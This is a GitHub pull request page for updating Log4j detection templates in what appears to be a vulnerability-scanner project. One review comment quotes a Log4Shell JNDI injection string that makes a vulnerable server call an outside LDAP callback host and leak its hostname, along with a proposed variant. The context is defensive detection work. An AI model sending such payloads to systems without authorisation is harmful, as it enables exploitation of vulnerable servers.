Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Update All Existing Log4j Templates #7170

Merged
merged 12 commits into from
May 11, 2023
Merged

Update All Existing Log4j Templates #7170

merged 12 commits into from
May 11, 2023

Conversation

ritikchaddha
Copy link
Contributor

Template / PR Information

  • Fixed CVE-2020-XXX / Added CVE-2020-XXX / Updated CVE-2020-XXX
  • References:

Template Validation

I've validated this template locally?

  • YES
  • NO

Additional Details (leave it blank if not applicable)

Additional References:

@ritikchaddha ritikchaddha self-assigned this May 3, 2023
@auto-assign auto-assign bot requested a review from DhiyaneshGeek May 3, 2023 11:52
@ritikchaddha ritikchaddha linked an issue May 3, 2023 that may be closed by this pull request
Updating Detection in All Existing Log4j Templates #7159
Closed
24 tasks
@pwnhxl
Copy link
Contributor

pwnhxl commented May 3, 2023

@ritikchaddha
Suggest changing 'uri'

${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.uri.{{interactsh-url}}}
>>
${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.{{rand1}}.{{interactsh-url}}}

@ritikchaddha
Copy link
Contributor Author

Hello there, @pwnhxl. The purpose of adding uri or other keywords is to identify the place of payload injection into the template during the callback.

@ritikchaddha ritikchaddha added the Done Ready to merge label May 11, 2023
@ritikchaddha ritikchaddha merged commit 9082cb7 into main May 11, 2023
2 checks passed
@ritikchaddha ritikchaddha deleted the update-log4j branch May 11, 2023 07:43
@ritikchaddha ritikchaddha restored the update-log4j branch May 29, 2023 07:17
@ehsandeep ehsandeep deleted the update-log4j branch August 4, 2023 12:03
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@DhiyaneshGeek DhiyaneshGeek DhiyaneshGeek approved these changes

@princechaddha princechaddha Awaiting requested review from princechaddha

Assignees

@ritikchaddha ritikchaddha

Labels
Done Ready to merge
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

Updating Detection in All Existing Log4j Templates
3 participants
@ritikchaddha @pwnhxl @DhiyaneshGeek